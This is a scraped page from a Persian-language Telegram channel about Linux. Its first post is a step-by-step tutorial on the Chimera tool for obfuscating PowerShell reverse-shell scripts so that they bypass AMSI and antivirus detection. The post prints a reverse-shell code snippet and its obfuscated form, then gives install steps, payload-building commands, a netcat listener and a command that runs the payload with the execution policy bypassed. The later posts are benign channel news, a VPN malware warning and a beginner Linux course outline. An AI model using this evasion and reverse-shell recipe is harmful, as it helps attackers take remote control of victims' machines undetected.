Cafe Linux – Telegram
Cafe Linux
843 subscribers
88 photos
26 videos
118 files
186 links
🔸 Linux and Programming Concepts
🔸 IT EBooks

" Free " as in free speech , not as in (Free Beer) "

whoami : @weaksecurity
ChatRoom Link :
{ https://news.1rj.ru/str/+YGnmwL6TNhk2ZDVk }
Forum :
{ https://news.1rj.ru/str/+tcz1EzVJSGs1ZDhk }

© Copyleft - Tārokh
Download Telegram
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.

تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )

$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)


نحوه ی نصب در Linux :
1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

2. کلون کردن ریپو :
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) :
sudo chown root:root -R /opt/chimera/

4. تغییر مسیر به opt/chimera/ :
cd /opt/chimera/

5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :
sudo chmod +x chimera.sh

6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :
./chimera.sh —help

نحوه ی استفاده از اسکریپت :
1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1

2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :
1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :
پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1

گرفتن دسترسی :
1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :
powershell.exe -ep bypass C:\<PATH>\Payload.ps1

و تمام.
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
4👍1
Kelid
Jadi
Cafe Linux pinned a video
بعد از مدت ها ، برف
19🔥13🍾7🎃2👍1🥴1🐳1
Air Miles
Jadi
2
Cafe Linux
بعد از مدت ها ، برف
آتیش نزارید آب میشه خب 😂😂 یخ بزارید
13🔥3😁1
Cafe Linux
آتیش نزارید آب میشه خب 😂😂 یخ بزارید
آدم برفی فعال شد ☃️
19🔥1🤡1
https://news.1rj.ru/str/+NgSIMFDC0K00NWNk

🔸 گروه کافه لینوکس ، سوالی دارید بپرسید جواب میدم ، باعث پیشرفت همدیگه باشیم .

🔹 مخ زنی ممنوع
اگر از سرویس وی پی ان 20Speed ​ استفاده میکنید هرچه سریع تر اون رو پاک کنید به گزارش بیت دیفندر این vpn حاوی بدافزار و کی لاگر هست
https://www.bitdefender.com/blog/labs/eyespy-iranian-spyware-delivered-in-vpn-installers/
👍8
👍9
درود دوستان ، چنل از عرش به فرش رسیده . ولی درست میشه .

من دوره رایگان رکورد کردم ، جذب کانال خوب شده بود ، یه بنده خدایی زورش اومد این کارو کرد .

اهمیت نداره من به کار خودم ادامه میدم ، شما هم حمایت کنید ❤️
👍203🔥3😢1
Cafe Linux pinned «درود دوستان ، چنل از عرش به فرش رسیده . ولی درست میشه . من دوره رایگان رکورد کردم ، جذب کانال خوب شده بود ، یه بنده خدایی زورش اومد این کارو کرد . اهمیت نداره من به کار خودم ادامه میدم ، شما هم حمایت کنید ❤️»
سلام دوستان ، با پوزش به دلیل به فنا رفتن کانال می‌خوام بگم که احتمال زیاد کانال می‌ره رو mod کتاب و pdf و پادکست تا زمانی که ممبرا برگردن 💔 .

فیلم ها حتما ادامه پیدا می‌کنه نگران نباشید ، دوره های بیشتر هم حتما بعد از این دوره رکورد خواهد شد . داخل کانال بمونید و حمایت کنید . به امید روز بهتر ☃️♥️ .
11👍4💔4
سرفصل دوره لینوکس برای نوب ها ، کافه لینوکس :

پادکست اول : تاریخچه لینوکس
پادکست دوم : تاریخچه لینوکس و نگاهی به اوپن سورس
پادکست سوم : توزیع ها در لینوکس و نگاهی به توزیع REDHAT .
پادکست چهارم ( آخر ) : توزیع ها در لینوکس

اولین پست من داخل مدیوم ، درمورد تاریخچه لینوکس

ویدیو های لینوکس اسنشیال ، کافه لینوکس :

فیلم اول : نگاهی به سایت اوپن سورس و تایم لاین دیسترو های لینوکس و . . .

فیلم دوم : مدارکی که داخل لینوکس میتونید بگیرید ، شرایطش و اینکه کجا برید چکار کنید ، درمورد desktop environment ها حرف زدم و گفتم که shell چیه و اولین دستور خودتونو وارد کردید .

فیلم سوم : اولین دستوراتمون رو وارد کردیم

فیلم چهارم : کار کردن با فایل ها ، داخل فایل رو ببینید بدون اینکه بخواید بازش کنید ، page by page دیدن فایل ها و . .

فیلم پنجم : کپی کنید ، move کنید و اسمو عوض کنید و مبحث مهم Redirection داخل این ویدیو توضیح داده شد ، یه آهنگ هم ساختیم ، 0 و 1 های سه تا آهنگو همرو ریختیم تو یدونه فایل و . . . .

اون آهنگی که درست کردیم اینه

فیلم ششم : تا الان فقط فایل رو می دیدید ، الان فایل رو می‌نویسید :) با vim و nano آشنا شدیم و دیدیم چجوری کار میکنن .

فیلم هفتم : سخت افزار چجوری کار می‌کنه ، چجوری firmware کار می‌کنه و اصلا چی هست ، انواعشون رو گفتم . Bootloader چیه و کرنل رو چجوری لود می‌کنه و کرنل چجوری بقیه پروسس هارو اجرا می‌کنه رو نشونتون دادم .

لینک گروه کافه لینوکس .


این داستان ادامه دارد
👍114😁2👏1
Cafe Linux pinned «سرفصل دوره لینوکس برای نوب ها ، کافه لینوکس : پادکست اول : تاریخچه لینوکس پادکست دوم : تاریخچه لینوکس و نگاهی به اوپن سورس پادکست سوم : توزیع ها در لینوکس و نگاهی به توزیع REDHAT . پادکست چهارم ( آخر ) : توزیع ها در لینوکس اولین پست من داخل مدیوم ، درمورد…»